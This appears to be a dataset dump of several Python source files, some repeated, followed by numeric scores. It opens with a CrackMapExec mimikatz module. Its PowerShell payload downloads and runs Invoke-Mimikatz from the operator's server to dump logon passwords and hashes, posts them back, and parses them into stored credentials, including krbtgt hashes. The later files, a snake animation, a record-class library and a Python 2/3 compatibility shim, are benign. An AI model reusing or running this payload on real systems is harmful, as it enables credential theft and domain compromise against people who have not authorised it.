if '** SAM ACCOUNT **' in lines:
domain, user, userHash, dcName, sid = "", "", "", "", ""
for line in lines:
try:
if line.strip().endswith("will be the domain"):
domain = line.split("'")[1]
elif line.strip().endswith("will be the DC server"):
dcName = line.split("'")[1].split(".")[0]
elif line.strip().startswith("SAM Username"):
user = line.split(":")[1].strip()
elif line.strip().startswith("Object Security ID"):
parts = line.split(":")[1].strip().split("-")
sid = "-".join(parts[0:-1])
elif line.strip().startswith("Hash NTLM:"):
userHash = line.split(":")[1].strip()
except:
pass
if domain != "" and userHash != "":
creds.append(("hash", domain, user, userHash, dcName, sid))
return self.uniquify_tuples(creds)
def on_response(self, context, response):
response.send_response(200)
response.end_headers()
length = int(response.headers.getheader('content-length'))
data = response.rfile.read(length)
#We've received the response, stop tracking this host
response.stop_tracking_host()
if len(data):
creds = self.parse_mimikatz(data)
if len(creds):
context.log.success("Found credentials in Mimikatz output (domain\\username:password)")
for cred_set in creds:
credtype, domain, username, password,_,_ = cred_set
context.db.add_credential(credtype, domain, username, password)
context.log.highlight('{}\\{}:{}'.format(domain, username, password))
log_name = 'Mimikatz-{}-{}.log'.format(response.client_address[0], datetime.now().strftime("%Y-%m-%d_%H%M%S"))
write_log(data, log_name)
context.log.info("Saved Mimikatz's output to {}".format(log_name))
|
cme/modules/mimikatz.py
|
from cme.helpers import create_ps_command, get_ps_script, obfs_ps_script, gen_random_string, validate_ntlm, write_log
from datetime import datetime
import re
class CMEModule:
'''
Executes PowerSploit's Invoke-Mimikatz.ps1 script
Module by @byt3bl33d3r
'''
name = 'mimikatz'
description = "Executes PowerSploit's Invoke-Mimikatz.ps1 script"
def options(self, context, module_options):
'''
COMMAND Mimikatz command to execute (default: 'sekurlsa::logonpasswords')
'''
self.mimikatz_command = 'privilege::debug sekurlsa::logonpasswords exit'
if module_options and 'COMMAND' in module_options:
self.mimikatz_command = module_options['COMMAND']
#context.log.debug("Mimikatz command: '{}'".format(self.mimikatz_command))
self.obfs_name = gen_random_string()
def on_admin_login(self, context, connection):
payload = '''
IEX (New-Object Net.WebClient).DownloadString('{server}://{addr}:{port}/Invoke-Mimikatz.ps1');
$creds = Invoke-{func_name} -Command '{command}';
$request = [System.Net.WebRequest]::Create('{server}://{addr}:{port}/');
$request.Method = 'POST';
$request.ContentType = 'application/x-www-form-urlencoded';
$bytes = [System.Text.Encoding]::ASCII.GetBytes($creds);
$request.ContentLength = $bytes.Length;
$requestStream = $request.GetRequestStream();
$requestStream.Write( $bytes, 0, $bytes.Length );
$requestStream.Close();
$request.GetResponse();'''.format(server=context.server,
port=context.server_port,
addr=context.localip,
func_name=self.obfs_name,
command=self.mimikatz_command)
context.log.debug('Payload: {}'.format(payload))
payload = create_ps_command(payload)
connection.execute(payload)
context.log.success('Executed payload')
def on_request(self, context, request):
if 'Invoke-Mimikatz.ps1' == request.path[1:]:
request.send_response(200)
request.end_headers()
with open(get_ps_script('Exfiltration/Invoke-Mimikatz.ps1'), 'r') as ps_script:
ps_script = obfs_ps_script(ps_script.read(), self.obfs_name)
request.wfile.write(ps_script)
else:
request.send_response(404)
request.end_headers()
def uniquify_tuples(self, tuples):
"""
uniquify mimikatz tuples based on the password
cred format- (credType, domain, username, password, hostname, sid)
Stolen from the Empire project.
"""
seen = set()
return [item for item in tuples if "{}{}{}{}".format(item[0],item[1],item[2],item[3]) not in seen and not seen.add("{}{}{}{}".format(item[0],item[1],item[2],item[3]))]
def parse_mimikatz(self, data):
"""
Parse the output from Invoke-Mimikatz to return credential sets.
This was directly stolen from the Empire project as well.
"""
# cred format:
# credType, domain, username, password, hostname, sid
creds = []
# regexes for "sekurlsa::logonpasswords" Mimikatz output
regexes = ["(?s)(?<=msv :).*?(?=tspkg :)", "(?s)(?<=tspkg :).*?(?=wdigest :)", "(?s)(?<=wdigest :).*?(?=kerberos :)", "(?s)(?<=kerberos :).*?(?=ssp :)", "(?s)(?<=ssp :).*?(?=credman :)", "(?s)(?<=credman :).*?(?=Authentication Id :)", "(?s)(?<=credman :).*?(?=mimikatz)"]
hostDomain = ""
domainSid = ""
hostName = ""
lines = data.split("\n")
for line in lines[0:2]:
if line.startswith("Hostname:"):
try:
domain = line.split(":")[1].strip()
temp = domain.split("/")[0].strip()
domainSid = domain.split("/")[1].strip()
hostName = temp.split(".")[0]
hostDomain = ".".join(temp.split(".")[1:])
except:
pass
for regex in regexes:
p = re.compile(regex)
for match in p.findall(data):
lines2 = match.split("\n")
username, domain, password = "", "", ""
for line in lines2:
try:
if "Username" in line:
username = line.split(":",1)[1].strip()
elif "Domain" in line:
domain = line.split(":",1)[1].strip()
elif "NTLM" in line or "Password" in line:
password = line.split(":",1)[1].strip()
except:
pass
if username != "" and password != "" and password != "(null)":
sid = ""
# substitute the FQDN in if it matches
if hostDomain.startswith(domain.lower()):
domain = hostDomain
sid = domainSid
if validate_ntlm(password):
credType = "hash"
else:
credType = "plaintext"
# ignore machine account plaintexts
if not (credType == "plaintext" and username.endswith("$")):
creds.append((credType, domain, username, password, hostName, sid))
if len(creds) == 0:
# check if we have lsadump output to check for krbtgt
# happens on domain controller hashdumps
for x in xrange(8,13):
if lines[x].startswith("Domain :"):
domain, sid, krbtgtHash = "", "", ""
try:
domainParts = lines[x].split(":")[1]
domain = domainParts.split("/")[0].strip()
sid = domainParts.split("/")[1].strip()
# substitute the FQDN in if it matches
if hostDomain.startswith(domain.lower()):
domain = hostDomain
sid = domainSid
for x in xrange(0, len(lines)):
if lines[x].startswith("User : krbtgt"):
krbtgtHash = lines[x+2].split(":")[1].strip()
break
if krbtgtHash != "":
creds.append(("hash", domain, "krbtgt", krbtgtHash, hostName, sid))
except Exception as e:
pass
if len(creds) == 0:
# check if we get lsadump::dcsync output
if '** SAM ACCOUNT **' in lines:
domain, user, userHash, dcName, sid = "", "", "", "", ""
for line in lines:
try:
if line.strip().endswith("will be the domain"):
domain = line.split("'")[1]
elif line.strip().endswith("will be the DC server"):
dcName = line.split("'")[1].split(".")[0]
elif line.strip().startswith("SAM Username"):
user = line.split(":")[1].strip()
elif line.strip().startswith("Object Security ID"):
parts = line.split(":")[1].strip().split("-")
sid = "-".join(parts[0:-1])
elif line.strip().startswith("Hash NTLM:"):
userHash = line.split(":")[1].strip()
except:
pass
if domain != "" and userHash != "":
creds.append(("hash", domain, user, userHash, dcName, sid))
return self.uniquify_tuples(creds)
def on_response(self, context, response):
response.send_response(200)
response.end_headers()
length = int(response.headers.getheader('content-length'))
data = response.rfile.read(length)
#We've received the response, stop tracking this host
response.stop_tracking_host()
if len(data):
creds = self.parse_mimikatz(data)
if len(creds):
context.log.success("Found credentials in Mimikatz output (domain\\username:password)")
for cred_set in creds:
credtype, domain, username, password,_,_ = cred_set
context.db.add_credential(credtype, domain, username, password)
context.log.highlight('{}\\{}:{}'.format(domain, username, password))
log_name = 'Mimikatz-{}-{}.log'.format(response.client_address[0], datetime.now().strftime("%Y-%m-%d_%H%M%S"))
write_log(data, log_name)
context.log.info("Saved Mimikatz's output to {}".format(log_name))
| 0.268078 | 0.163445 |
import matplotlib as mpl
mpl.use('TkAgg')
import time
import numpy as np
import matplotlib.pyplot as plt
from matplotlib.backends.backend_tkagg import FigureCanvasTkAgg
import tkinter as Tk
import snake_classes
# Hacky global variables (shame on you)
root = None
reset_button = None
snake = None
ax = None
canvas = None
trapped_msg = None
def make_snake(body_color = 'viridis'):
global snake
snake = snake_classes.Snake((int(((ax.get_xlim()[1] - ax.get_xlim()[0]) / 2)) + 4,
int(((ax.get_ylim()[1] - ax.get_ylim()[0]) / 2))),
'right', 16, label='snake1')
snake.set_body_color(body_color)
return(snake)
def update_canvas():
global snake
global ax
global canvas
directions = ('up', 'down', 'left', 'right')
dir_choices = list(directions)
new_dir = None
for i in range(len(dir_choices)):
# Type conversion is because validation functions are expecting
# a str type not a numpy.str_ type
new_dir = str(np.random.choice(dir_choices))
new_head_pos = snake.get_new_head_pos(new_dir)
if (ax.get_xlim()[0] == new_head_pos[0]
or ax.get_xlim()[1] + 1 == new_head_pos[0]
or ax.get_ylim()[0] == new_head_pos[1]
or ax.get_ylim()[1] + 1 == new_head_pos[1]):
dir_choices.remove(new_dir)
new_dir = None
continue
try:
snake.move_snake_one(new_dir)
break
except ValueError:
dir_choices.remove(new_dir)
new_dir = None
continue
if new_dir is None:
add_trapped_msg()
else:
snake.remove_from_axes(ax)
snake.draw_on_axes(ax)
canvas.draw()
root.after(250, update_canvas)
def add_trapped_msg():
global ax
global canvas
global trapped_msg
width, height = ax.figure.get_size_inches()
text_height= height * 0.05
size = text_height * 72
trapped_msg = ax.text(0.5, 0.5, 'Your snake is trapped!',
horizontalalignment='center',
verticalalignment='center',
transform=ax.transAxes, size=size,
bbox=dict(boxstyle='square',
facecolor='#FF8080',
edgecolor='#FFCDCD'))
canvas.draw()
reset_button.config(state='active')
def _reset():
global snake
global ax
global canvas
global trapped_msg
if trapped_msg is None:
        raise AssertionError('_reset() ran without a trapped_msg!')
trapped_msg.remove()
snake.remove_from_axes(ax)
snake = make_snake()
snake.draw_on_axes(ax)
canvas.draw()
time.sleep(0.25)
update_canvas()
reset_button.config(state='disabled')
def _quit():
root.quit() # stops mainloop
def main():
global root
global reset_button
global snake
global ax
global canvas
root = Tk.Tk()
root.wm_title("Meandering Snake")
fig = plt.figure(figsize=(8, 8), dpi=100)
ax = fig.add_subplot(111)
canvas = FigureCanvasTkAgg(fig, master=root)
canvas.draw()
canvas.get_tk_widget().pack(side=Tk.TOP, fill=Tk.BOTH, expand=1)
BOARD_SIZE = (30, 30)
ax.set_aspect('equal')
ax.set_xlim(0, BOARD_SIZE[0])
ax.set_ylim(0, BOARD_SIZE[1])
ax.set_xticks([i for i in range(BOARD_SIZE[0] + 1)])
ax.set_yticks([i for i in range(BOARD_SIZE[1] + 1)])
ax.tick_params(length=0)
ax.set_xticklabels([])
ax.set_yticklabels([])
width, height = ax.figure.get_size_inches()
spine_lw = min(width, height) * 0.02 * 72
del width
del height
spine_color = '#000000'
ax.spines['top'].set_linewidth(spine_lw)
ax.spines['top'].set_edgecolor(spine_color)
ax.spines['bottom'].set_linewidth(spine_lw)
ax.spines['bottom'].set_edgecolor(spine_color)
ax.spines['left'].set_linewidth(spine_lw)
ax.spines['left'].set_edgecolor(spine_color)
ax.spines['right'].set_linewidth(spine_lw)
ax.spines['right'].set_edgecolor(spine_color)
ax.set_position([0, 0, 1, 1])
ax.set_facecolor('#C1C1C1')
quit_button = Tk.Button(master=root, text='Quit', command=_quit)
quit_button.pack(side=Tk.BOTTOM)
reset_button = Tk.Button(master=root, text='Reset', command=_reset)
reset_button.config(state='disabled')
reset_button.pack(side=Tk.BOTTOM)
snake = make_snake()
snake.draw_on_axes(ax)
canvas.draw()
root.after(250, update_canvas)
Tk.mainloop()
if __name__ == '__main__':
main()
|
meandering_snake/meandering_snake.py
|
import matplotlib as mpl
mpl.use('TkAgg')
import time
import numpy as np
import matplotlib.pyplot as plt
from matplotlib.backends.backend_tkagg import FigureCanvasTkAgg
import tkinter as Tk
import snake_classes
# Hacky global variables (shame on you)
root = None
reset_button = None
snake = None
ax = None
canvas = None
trapped_msg = None
def make_snake(body_color = 'viridis'):
global snake
snake = snake_classes.Snake((int(((ax.get_xlim()[1] - ax.get_xlim()[0]) / 2)) + 4,
int(((ax.get_ylim()[1] - ax.get_ylim()[0]) / 2))),
'right', 16, label='snake1')
snake.set_body_color(body_color)
return(snake)
def update_canvas():
global snake
global ax
global canvas
directions = ('up', 'down', 'left', 'right')
dir_choices = list(directions)
new_dir = None
for i in range(len(dir_choices)):
# Type conversion is because validation functions are expecting
# a str type not a numpy.str_ type
new_dir = str(np.random.choice(dir_choices))
new_head_pos = snake.get_new_head_pos(new_dir)
if (ax.get_xlim()[0] == new_head_pos[0]
or ax.get_xlim()[1] + 1 == new_head_pos[0]
or ax.get_ylim()[0] == new_head_pos[1]
or ax.get_ylim()[1] + 1 == new_head_pos[1]):
dir_choices.remove(new_dir)
new_dir = None
continue
try:
snake.move_snake_one(new_dir)
break
except ValueError:
dir_choices.remove(new_dir)
new_dir = None
continue
if new_dir is None:
add_trapped_msg()
else:
snake.remove_from_axes(ax)
snake.draw_on_axes(ax)
canvas.draw()
root.after(250, update_canvas)
def add_trapped_msg():
global ax
global canvas
global trapped_msg
width, height = ax.figure.get_size_inches()
text_height= height * 0.05
size = text_height * 72
trapped_msg = ax.text(0.5, 0.5, 'Your snake is trapped!',
horizontalalignment='center',
verticalalignment='center',
transform=ax.transAxes, size=size,
bbox=dict(boxstyle='square',
facecolor='#FF8080',
edgecolor='#FFCDCD'))
canvas.draw()
reset_button.config(state='active')
def _reset():
global snake
global ax
global canvas
global trapped_msg
if trapped_msg is None:
        raise AssertionError('_reset() ran without a trapped_msg!')
trapped_msg.remove()
snake.remove_from_axes(ax)
snake = make_snake()
snake.draw_on_axes(ax)
canvas.draw()
time.sleep(0.25)
update_canvas()
reset_button.config(state='disabled')
def _quit():
root.quit() # stops mainloop
def main():
global root
global reset_button
global snake
global ax
global canvas
root = Tk.Tk()
root.wm_title("Meandering Snake")
fig = plt.figure(figsize=(8, 8), dpi=100)
ax = fig.add_subplot(111)
canvas = FigureCanvasTkAgg(fig, master=root)
canvas.draw()
canvas.get_tk_widget().pack(side=Tk.TOP, fill=Tk.BOTH, expand=1)
BOARD_SIZE = (30, 30)
ax.set_aspect('equal')
ax.set_xlim(0, BOARD_SIZE[0])
ax.set_ylim(0, BOARD_SIZE[1])
ax.set_xticks([i for i in range(BOARD_SIZE[0] + 1)])
ax.set_yticks([i for i in range(BOARD_SIZE[1] + 1)])
ax.tick_params(length=0)
ax.set_xticklabels([])
ax.set_yticklabels([])
width, height = ax.figure.get_size_inches()
spine_lw = min(width, height) * 0.02 * 72
del width
del height
spine_color = '#000000'
ax.spines['top'].set_linewidth(spine_lw)
ax.spines['top'].set_edgecolor(spine_color)
ax.spines['bottom'].set_linewidth(spine_lw)
ax.spines['bottom'].set_edgecolor(spine_color)
ax.spines['left'].set_linewidth(spine_lw)
ax.spines['left'].set_edgecolor(spine_color)
ax.spines['right'].set_linewidth(spine_lw)
ax.spines['right'].set_edgecolor(spine_color)
ax.set_position([0, 0, 1, 1])
ax.set_facecolor('#C1C1C1')
quit_button = Tk.Button(master=root, text='Quit', command=_quit)
quit_button.pack(side=Tk.BOTTOM)
reset_button = Tk.Button(master=root, text='Reset', command=_reset)
reset_button.config(state='disabled')
reset_button.pack(side=Tk.BOTTOM)
snake = make_snake()
snake.draw_on_axes(ax)
canvas.draw()
root.after(250, update_canvas)
Tk.mainloop()
if __name__ == '__main__':
main()
| 0.413359 | 0.168309 |
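A standalone sketch of the wall-avoidance loop in update_canvas above: pick a random direction whose next head position stays on the board, dropping blocked directions until none remain. It reimplements only the boundary check, so the Snake class and matplotlib are not involved; MOVES and pick_direction are illustrative names.

import random

# direction -> (dx, dy), mirroring the four choices used by update_canvas
MOVES = {"up": (0, 1), "down": (0, -1), "left": (-1, 0), "right": (1, 0)}

def pick_direction(head, xlim, ylim):
    """Return a direction that keeps the head inside the board, or None if trapped."""
    choices = list(MOVES)
    while choices:
        direction = random.choice(choices)
        dx, dy = MOVES[direction]
        x, y = head[0] + dx, head[1] + dy
        # blocked when the new position lands on the lower edge or just past the
        # upper edge, matching the xlim/ylim comparison in update_canvas
        if x != xlim[0] and x != xlim[1] + 1 and y != ylim[0] and y != ylim[1] + 1:
            return direction
        choices.remove(direction)
    return None

if __name__ == "__main__":
    print(pick_direction((15, 15), (0, 30), (0, 30)))  # any of the four directions
    print(pick_direction((1, 1), (0, 0), (0, 0)))      # None: every move leaves the 1x1 board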
import copy
import itertools
import sys
class RecordClass(object):
__slots__ = ()
required_attributes = ()
optional_attributes = {}
def __init__(self, *args, **kwargs):
        # First, check that at least the required number of arguments is provided.
required_attributes = type(self).required_attributes
if len(args) + len(kwargs.keys()) < len(required_attributes):
raise ValueError(
'Invalid arguments', type(self), args, kwargs, self.__slots__)
# Second, check if there are any overlapping arguments.
conflicts = (frozenset(kwargs.keys()) &
frozenset(required_attributes[:len(args)]))
if conflicts:
raise TypeError(
'Keyword arguments conflict with positional arguments: %s',
conflicts)
# Third, check all required attributes are provided.
required_kwargs = set(kwargs.keys()) & set(required_attributes)
num_provided = len(args) + len(required_kwargs)
if num_provided != len(required_attributes):
raise TypeError(
'__init__ takes exactly %d arguments but %d were given: %s' % (
len(required_attributes), num_provided,
required_attributes))
for slot, arg in itertools.chain(
zip(type(self).required_attributes, args), kwargs.items()):
object.__setattr__(self, slot, arg)
# Set defaults.
for attr, value in type(self).optional_attributes.items():
if attr not in kwargs:
if callable(value):
value = value()
object.__setattr__(self, attr, value)
def __str__(self):
return self._str(type(self).all_attribute_names)
def _str(self, str_attrs):
attrs = []
for attr in str_attrs:
attrs.append('%s=%s' % (attr, repr(getattr(self, attr))))
return '%s(%s)' % (type(self).__name__, ', '.join(attrs))
__repr__ = __str__
def __eq__(self, other):
return (
self is other
or type(self) == type(other)
and self._isequal_fields(other, self.__slots__))
def __ne__(self, other):
return not self == other
def _isequal_fields(self, other, fields):
return all(getattr(self, attr) == getattr(other, attr)
for attr in fields)
def __copy__(self):
return type(self)(**{attr: getattr(self, attr)
for attr in self.__slots__})
def __deepcopy__(self, memo):
return type(self)(**{attr: copy.deepcopy(getattr(self, attr), memo)
for attr in self.__slots__})
def __getstate__(self):
"""Get the current state of all attributes."""
return {attr: getattr(self, attr) for attr in type(self).__slots__}
def __setstate__(self, state):
"""Set the state of attributes."""
        for attr, value in state.items():  # items() works on both Python 2 and 3
setattr(self, attr, value)
class HashableRecordClass(RecordClass):
"""Hashable version of RecordClass.
Use this when the record is considered immutable enough to be hashable.
Immutability is not enforced, but is recommended.
Do not use if the record or any of its fields' values will ever be modified.
"""
def __hash__(self):
return hash(
tuple(hash(getattr(self, attr)) for attr in self.__slots__))
class RecordMeta(type):
def __new__(cls, name, bases, attrs):
required_attributes = [] # Combine the bases' req attrs first.
attrs['optional_attributes'] = attrs.get('optional_attributes', {})
for base in bases:
if issubclass(base, RecordClass):
# Check for repeated attributes first.
repeats = (set(required_attributes) &
set(base.required_attributes))
assert not repeats, 'Required attributes clash: %s' % repeats
repeats = (set(attrs['optional_attributes']) &
set(base.optional_attributes))
assert not repeats, 'Optional attributes clash: %s' % repeats
required_attributes.extend(base.required_attributes)
attrs['optional_attributes'].update(base.optional_attributes)
# If this class defines any attributes in a superclass's
# required attributes, make it an optional attribute with a
# default with the given value.
provided = set(base.required_attributes) & set(attrs)
for attr in provided:
required_attributes.remove(attr)
attrs['optional_attributes'][attr] = attrs.pop(attr)
# Allow the class to override optional attribute defaults
# as well.
provided = set(base.optional_attributes) & set(attrs)
for attr in provided:
attrs['optional_attributes'][attr] = attrs.pop(attr)
attrs['required_attributes'] = tuple(
required_attributes + list(attrs.get('required_attributes', ())))
attrs['__slots__'] = (tuple(attrs['required_attributes']) +
tuple(attrs['optional_attributes'].keys()))
return super(RecordMeta, cls).__new__(cls, name, bases, attrs)
def __str__(cls):
return '<Record: %s>' % cls.__name__
__repr__ = __str__
def __eq__(cls, other):
if not isinstance(other, RecordMeta):
return False
return (
cls is other
or cls.required_attributes == other.required_attributes
and cls.optional_attributes == other.optional_attributes)
def __ne__(self, other):
return not self == other
def __hash__(cls):
return hash(
(cls.required_attributes,
frozenset(cls.optional_attributes.items())))
@property
def all_attribute_names(cls):
return itertools.chain(
cls.required_attributes,
cls.optional_attributes.keys())
def Record(cls_name, required_attributes=(), optional_attributes={}):
attrs = {'required_attributes': tuple(required_attributes),
'optional_attributes': dict(optional_attributes)}
cls = RecordMeta(cls_name, (RecordClass,), attrs)
# Copied from collections.py, the bottom of namedtuple:
# For pickling to work, the __module__ variable needs to be set to the frame
# where the named tuple is created. Bypass this step in enviroments where
# sys._getframe is not defined (Jython for example).
if hasattr(sys, '_getframe'):
cls.__module__ = sys._getframe(1).f_globals.get('__name__', '__main__')
return cls
def HashableRecord(cls_name, required_attributes=(), optional_attributes={}):
attrs = {'required_attributes': tuple(required_attributes),
'optional_attributes': dict(optional_attributes)}
return RecordMeta(cls_name, (HashableRecordClass,), attrs)
def CopyRecord(record, **field_overrides):
"""Copies a record and its fields, recurses for any field that is a Record.
For records that have nested mutable fields, use copy.deepcopy.
Args:
record: A Record instance to be copied.
**field_overrides: Fields and their values to override in the new copy.
Returns: A copy of the given record with any fields overridden.
"""
fields = field_overrides
for field in record.__slots__:
if field in field_overrides:
continue
value = getattr(record, field)
if isinstance(value, RecordClass):
# Recurse for records.
new_value = CopyRecord(value)
else:
new_value = copy.copy(value)
fields[field] = new_value
return type(record)(**fields)
|
mutablerecords/records.py
|
import copy
import itertools
import sys
class RecordClass(object):
__slots__ = ()
required_attributes = ()
optional_attributes = {}
def __init__(self, *args, **kwargs):
        # First, check that at least the required number of arguments is provided.
required_attributes = type(self).required_attributes
if len(args) + len(kwargs.keys()) < len(required_attributes):
raise ValueError(
'Invalid arguments', type(self), args, kwargs, self.__slots__)
# Second, check if there are any overlapping arguments.
conflicts = (frozenset(kwargs.keys()) &
frozenset(required_attributes[:len(args)]))
if conflicts:
raise TypeError(
'Keyword arguments conflict with positional arguments: %s',
conflicts)
# Third, check all required attributes are provided.
required_kwargs = set(kwargs.keys()) & set(required_attributes)
num_provided = len(args) + len(required_kwargs)
if num_provided != len(required_attributes):
raise TypeError(
'__init__ takes exactly %d arguments but %d were given: %s' % (
len(required_attributes), num_provided,
required_attributes))
for slot, arg in itertools.chain(
zip(type(self).required_attributes, args), kwargs.items()):
object.__setattr__(self, slot, arg)
# Set defaults.
for attr, value in type(self).optional_attributes.items():
if attr not in kwargs:
if callable(value):
value = value()
object.__setattr__(self, attr, value)
def __str__(self):
return self._str(type(self).all_attribute_names)
def _str(self, str_attrs):
attrs = []
for attr in str_attrs:
attrs.append('%s=%s' % (attr, repr(getattr(self, attr))))
return '%s(%s)' % (type(self).__name__, ', '.join(attrs))
__repr__ = __str__
def __eq__(self, other):
return (
self is other
or type(self) == type(other)
and self._isequal_fields(other, self.__slots__))
def __ne__(self, other):
return not self == other
def _isequal_fields(self, other, fields):
return all(getattr(self, attr) == getattr(other, attr)
for attr in fields)
def __copy__(self):
return type(self)(**{attr: getattr(self, attr)
for attr in self.__slots__})
def __deepcopy__(self, memo):
return type(self)(**{attr: copy.deepcopy(getattr(self, attr), memo)
for attr in self.__slots__})
def __getstate__(self):
"""Get the current state of all attributes."""
return {attr: getattr(self, attr) for attr in type(self).__slots__}
def __setstate__(self, state):
"""Set the state of attributes."""
        for attr, value in state.items():  # items() works on both Python 2 and 3
setattr(self, attr, value)
class HashableRecordClass(RecordClass):
"""Hashable version of RecordClass.
Use this when the record is considered immutable enough to be hashable.
Immutability is not enforced, but is recommended.
Do not use if the record or any of its fields' values will ever be modified.
"""
def __hash__(self):
return hash(
tuple(hash(getattr(self, attr)) for attr in self.__slots__))
class RecordMeta(type):
def __new__(cls, name, bases, attrs):
required_attributes = [] # Combine the bases' req attrs first.
attrs['optional_attributes'] = attrs.get('optional_attributes', {})
for base in bases:
if issubclass(base, RecordClass):
# Check for repeated attributes first.
repeats = (set(required_attributes) &
set(base.required_attributes))
assert not repeats, 'Required attributes clash: %s' % repeats
repeats = (set(attrs['optional_attributes']) &
set(base.optional_attributes))
assert not repeats, 'Optional attributes clash: %s' % repeats
required_attributes.extend(base.required_attributes)
attrs['optional_attributes'].update(base.optional_attributes)
# If this class defines any attributes in a superclass's
# required attributes, make it an optional attribute with a
# default with the given value.
provided = set(base.required_attributes) & set(attrs)
for attr in provided:
required_attributes.remove(attr)
attrs['optional_attributes'][attr] = attrs.pop(attr)
# Allow the class to override optional attribute defaults
# as well.
provided = set(base.optional_attributes) & set(attrs)
for attr in provided:
attrs['optional_attributes'][attr] = attrs.pop(attr)
attrs['required_attributes'] = tuple(
required_attributes + list(attrs.get('required_attributes', ())))
attrs['__slots__'] = (tuple(attrs['required_attributes']) +
tuple(attrs['optional_attributes'].keys()))
return super(RecordMeta, cls).__new__(cls, name, bases, attrs)
def __str__(cls):
return '<Record: %s>' % cls.__name__
__repr__ = __str__
def __eq__(cls, other):
if not isinstance(other, RecordMeta):
return False
return (
cls is other
or cls.required_attributes == other.required_attributes
and cls.optional_attributes == other.optional_attributes)
def __ne__(self, other):
return not self == other
def __hash__(cls):
return hash(
(cls.required_attributes,
frozenset(cls.optional_attributes.items())))
@property
def all_attribute_names(cls):
return itertools.chain(
cls.required_attributes,
cls.optional_attributes.keys())
def Record(cls_name, required_attributes=(), optional_attributes={}):
attrs = {'required_attributes': tuple(required_attributes),
'optional_attributes': dict(optional_attributes)}
cls = RecordMeta(cls_name, (RecordClass,), attrs)
# Copied from collections.py, the bottom of namedtuple:
# For pickling to work, the __module__ variable needs to be set to the frame
# where the named tuple is created. Bypass this step in enviroments where
# sys._getframe is not defined (Jython for example).
if hasattr(sys, '_getframe'):
cls.__module__ = sys._getframe(1).f_globals.get('__name__', '__main__')
return cls
def HashableRecord(cls_name, required_attributes=(), optional_attributes={}):
attrs = {'required_attributes': tuple(required_attributes),
'optional_attributes': dict(optional_attributes)}
return RecordMeta(cls_name, (HashableRecordClass,), attrs)
def CopyRecord(record, **field_overrides):
"""Copies a record and its fields, recurses for any field that is a Record.
For records that have nested mutable fields, use copy.deepcopy.
Args:
record: A Record instance to be copied.
**field_overrides: Fields and their values to override in the new copy.
Returns: A copy of the given record with any fields overridden.
"""
fields = field_overrides
for field in record.__slots__:
if field in field_overrides:
continue
value = getattr(record, field)
if isinstance(value, RecordClass):
# Recurse for records.
new_value = CopyRecord(value)
else:
new_value = copy.copy(value)
fields[field] = new_value
return type(record)(**fields)
| 0.604399 | 0.14448 |
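A short usage sketch for the factories defined in the records module above. Pet, Tag, and their fields are invented for illustration; the calls themselves (Record, HashableRecord, CopyRecord) are the ones defined above, and the import path assumes the package layout shown in the repo path.

from mutablerecords.records import Record, HashableRecord, CopyRecord

# Required attribute 'name'; optional 'age' with a literal default and
# 'toys' with a callable default (evaluated per instance, so lists aren't shared).
Pet = Record('Pet', ['name'], {'age': 0, 'toys': list})

rex = Pet('Rex', age=3)
print(rex)                      # Pet(name='Rex', age=3, toys=[])
rex.toys.append('ball')         # mutable, unlike namedtuple

clone = CopyRecord(rex, name='Rex II')
print(clone.name, clone.age)    # Rex II 3

# HashableRecord instances can live in sets/dict keys; equal fields collapse.
Tag = HashableRecord('Tag', ['label'])
print(len({Tag('a'), Tag('a'), Tag('b')}))  # 2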
import sys
PY2 = sys.version_info[0] == 2
def _identity(x): # pragma: no cover
return x
__all__ = [
'BytesIO',
'PY2',
'StringIO',
'ascii_lowercase',
'cmp',
'configparser',
'console_to_str',
'imap',
'input',
'integer_types',
'iteritems',
'iterkeys',
'itervalues',
'izip',
'number_types',
'pickle',
'range_type',
'reraise',
'string_types',
'text_to_native',
'text_type',
'unichr',
'urllib',
    'urlparse',
'urlretrieve',
'_identity',
]
if PY2: # pragma: no cover
unichr = unichr
text_type = unicode
string_types = (str, unicode)
integer_types = (int, long)
from urllib import urlretrieve
def text_to_native(s, enc):
return s.encode(enc)
def iterkeys(d):
return d.iterkeys()
def itervalues(d):
return d.itervalues()
def iteritems(d):
return d.iteritems()
from cStringIO import StringIO as BytesIO
from StringIO import StringIO
import cPickle as pickle
import ConfigParser as configparser
from itertools import izip, imap
range_type = xrange
cmp = cmp
input = raw_input
from string import lower as ascii_lowercase
import urlparse
def console_to_str(s):
return s.decode('utf_8')
exec('def reraise(tp, value, tb=None):\n raise tp, value, tb')
else: # pragma: no cover
unichr = chr
text_type = str
string_types = (str,)
integer_types = (int, )
def text_to_native(s, enc):
return s
def iterkeys(d):
return iter(d.keys())
def itervalues(d):
return iter(d.values())
def iteritems(d):
return iter(d.items())
from io import StringIO
from io import BytesIO
import pickle
import configparser
izip = zip
imap = map
range_type = range
def cmp(a, b):
return (a > b) - (a < b)
input = input
from string import ascii_lowercase
import urllib.parse as urllib
import urllib.parse as urlparse
from urllib.request import urlretrieve
console_encoding = sys.__stdout__.encoding
def console_to_str(s):
        ''' From pypa/pip project, pip.backwardcompat. License MIT. '''
try:
return s.decode(console_encoding)
except UnicodeDecodeError:
return s.decode('utf_8')
def reraise(tp, value, tb=None):
if value.__traceback__ is not tb:
raise(value.with_traceback(tb))
raise value
number_types = integer_types + (float,)
|
mt940/_compat.py
|
import sys
PY2 = sys.version_info[0] == 2
def _identity(x): # pragma: no cover
return x
__all__ = [
'BytesIO',
'PY2',
'StringIO',
'ascii_lowercase',
'cmp',
'configparser',
'console_to_str',
'imap',
'input',
'integer_types',
'iteritems',
'iterkeys',
'itervalues',
'izip',
'number_types',
'pickle',
'range_type',
'reraise',
'string_types',
'text_to_native',
'text_type',
'unichr',
'urllib',
    'urlparse',
'urlretrieve',
'_identity',
]
if PY2: # pragma: no cover
unichr = unichr
text_type = unicode
string_types = (str, unicode)
integer_types = (int, long)
from urllib import urlretrieve
def text_to_native(s, enc):
return s.encode(enc)
def iterkeys(d):
return d.iterkeys()
def itervalues(d):
return d.itervalues()
def iteritems(d):
return d.iteritems()
from cStringIO import StringIO as BytesIO
from StringIO import StringIO
import cPickle as pickle
import ConfigParser as configparser
from itertools import izip, imap
range_type = xrange
cmp = cmp
input = raw_input
from string import lower as ascii_lowercase
import urlparse
def console_to_str(s):
return s.decode('utf_8')
exec('def reraise(tp, value, tb=None):\n raise tp, value, tb')
else: # pragma: no cover
unichr = chr
text_type = str
string_types = (str,)
integer_types = (int, )
def text_to_native(s, enc):
return s
def iterkeys(d):
return iter(d.keys())
def itervalues(d):
return iter(d.values())
def iteritems(d):
return iter(d.items())
from io import StringIO
from io import BytesIO
import pickle
import configparser
izip = zip
imap = map
range_type = range
def cmp(a, b):
